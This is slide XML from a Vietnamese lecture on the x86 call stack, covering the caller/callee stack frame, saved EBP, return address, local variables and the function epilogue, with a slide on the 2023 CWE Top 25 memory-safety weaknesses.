                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="00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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc1</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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc2</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34476" y="3924311"/>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943600" y="50716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59206" y="467695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8B2E7674-A21B-16AF-86A6-77CFAFB47260}"/>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8004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6. Gán giá trị trả về của hàm callee vào thanh ghi EAX</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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="00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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc1</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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc2</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34476" y="3924311"/>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808292" y="57574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59206" y="467695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DCF6AB2F-D51F-47D9-3982-6A8824FC5E12}"/>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47580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Thực hiện các lệnh kết thúc hàm callee để khôi phục giá trị cho EBP và ESP trỏ vào stack frame của hàm caller</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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="00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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc1</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latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc2</a:t>
                      </a:r>
                      <a:endParaRPr b="1">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34476" y="3924311"/>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808292" y="57574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59206" y="4676956"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AEF8EE-3B38-0614-4ABD-EC17E61E1228}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="5757486"/>
            <a:ext cx="1905000" cy="802963"/>
          </a:xfrm>
          <a:prstGeom prst="round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64E983D2-6ED0-6533-1209-863E71952722}"/>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6586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7. Di chuyển con trỏ ESP về vị trí của EBP ~ xóa vùng nhớ cấp phát cho biến cục bộ</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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mov %ebp, %esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">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1291500910"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>SFP của callee</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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loc1</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loc2</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34476" y="3924311"/>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808292" y="603180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029071" y="3924311"/>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095493C9-2C9D-EEA0-F716-C15B1702A29F}"/>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2934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F0C8B4-AFFE-BAE9-49B7-4F9C6965DE36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="797767" y="2301240"/>
            <a:ext cx="7508033" cy="3603856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0A9F12F-F7C4-41F8-9E4E-C2CD70A75792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2023 CWE Top 25</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DAD6B40-6B6D-417A-8E93-8C9B4E1852C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Danh sách 25 lỗ hổng phần mềm nguy hiểm nhất: 3 trong số Top10 là dạng lỗ hổng truy cập bộ nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>+5 lỗ hổng trong Top25 liên quan</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{986BE4F8-4B8C-4A03-AB01-4D970CC82AA6}"/>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extBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A738EF17-6777-E111-72B4-093E18A73187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5943600"/>
            <a:ext cx="4572000" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1"/>
              <a:t>Nguồn: https://cwe.mitre.org</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Oval 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE344E2-134A-277A-64ED-7F00D0EC7FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3429000"/>
            <a:ext cx="457200" cy="22860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AD3743C-6EAC-B050-BA9C-535FA8C0FB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5211496"/>
            <a:ext cx="457200" cy="22860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545C79EB-101A-4C4A-24D6-D73586329323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4605998"/>
            <a:ext cx="457200" cy="22860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09159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7. Lấy ra giá trị SFP ở đỉnh stack và gán cho EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>EBP trỏ vào stack frame của hàm caller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800"/>
              <a:t>ESP tăng ~ xóa ô nhớ chứa SFP</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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%ebp, %esp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pop %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    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3639948435"/>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RIP của callee</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SFP của callee</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loc1</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loc2</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20301" y="2148612"/>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808292" y="62146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20300" y="3581400"/>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D3019E77-6535-B7C5-F4F8-3EA3C9DE9BBC}"/>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3982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8. Lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t> thực hiện:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Lấy ra giá trị RIP ở đỉnh stack và gán cho EIP, khi đó EIP trỏ vào lệnh tiếp theo trong hàm caller, sau lời gọi hàm callee</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>ESP tăng ~ xóa ô nhớ chứa RIP</a:t>
            </a:r>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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%ebp, %esp</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1908559073"/>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2</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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx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RIP của callee</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SFP của callee</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loc1</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loc2</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20301" y="2148612"/>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867400" y="3276600"/>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20300" y="3200400"/>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D0137EB1-57B0-6668-9721-66D1585DA6B6}"/>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4924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25D7-09AF-5B32-B587-EC3348F11939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E78252-5AD1-9E3A-81DE-D7AC5AE66D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1710138"/>
            <a:ext cx="2345110" cy="4766861"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>9. Tăng giá trị ESP để xóa giá trị các tham số ra khỏi stack. Lúc này, stack đã khôi phục về trạng thái trước khi thực hiện lời gọi hàm callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD12FDE-F719-DEE9-D4FB-097D60A7C1DD}"/>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14" name="Google Shape;262;p28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2951976F-8292-9EA4-70F5-E732CF0B4CF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6559500" y="2057400"/>
            <a:ext cx="2432100" cy="4672582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="C00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100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>caller:</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$2</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push $1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    call 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add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callee:</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push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000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov %esp,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sub $8, %esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	…</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$0, %eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1600" b="1" kern="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRP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chemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov %ebp, %esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    pop %ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Google Shape;269;p28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35182374-A538-541E-88B9-E89605976238}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="292199"/>
            <a:ext cx="2283900" cy="107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marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>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caller()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p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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callee(1, 2)</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2" name="Google Shape;270;p28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B00E1E2D-BA17-F245-CF60-9EB68DA51D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5374000" y="297550"/>
            <a:ext cx="3677250" cy="1477297"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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int</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callee(int arg1, int</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1400" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> arg2</a:t>
            </a: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loc1[4];</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int loc2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>	...</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 0;</a:t>
            </a:r>
            <a:b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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C79DEFD-3AA4-F3C9-1463-2130819DDDB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="381000"/>
            <a:ext cx="5715000" cy="1329139"/>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Google Shape;309;p31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AED3988-837F-5401-65D1-52E40F572A4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3775347813"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3681325" y="2209800"/>
          <a:ext cx="2186075" cy="2805670"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2186075">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="6113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9E9E9E"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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2</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1</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RIP của callee</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SFP của callee</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loc1</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GB" b="1">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="60000"/>
                              <a:lumOff val="40000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>loc2</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="accent5">
                            <a:lumMod val="60000"/>
                            <a:lumOff val="40000"/>
                          </a:schemeClr>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4034333146"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="45" name="Group 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34FD6613-194A-3C23-32C2-BAD6FBB55E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2820301" y="2148612"/>
            <a:ext cx="797386" cy="338514"/>
            <a:chOff x="2209800" y="2209800"/>
            <a:chExt cx="797386" cy="338514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;311;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160ECF62-9E78-63C2-CAF3-718826C674DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2209800" y="2209800"/>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EBP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13" name="Google Shape;312;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9D3E9C2-F28C-9763-E456-01B2AA2332E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2757613" y="2379057"/>
              <a:ext cx="249573" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="595959"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E1AB7A5-F8DF-FEBD-0B82-28195A388CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5867400" y="3623886"/>
            <a:ext cx="1066800" cy="338514"/>
            <a:chOff x="5943600" y="4309686"/>
            <a:chExt cx="1066800" cy="338514"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Google Shape;315;p31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3974FC72-ACCD-D49A-8FE4-9421F58C5627}"/>
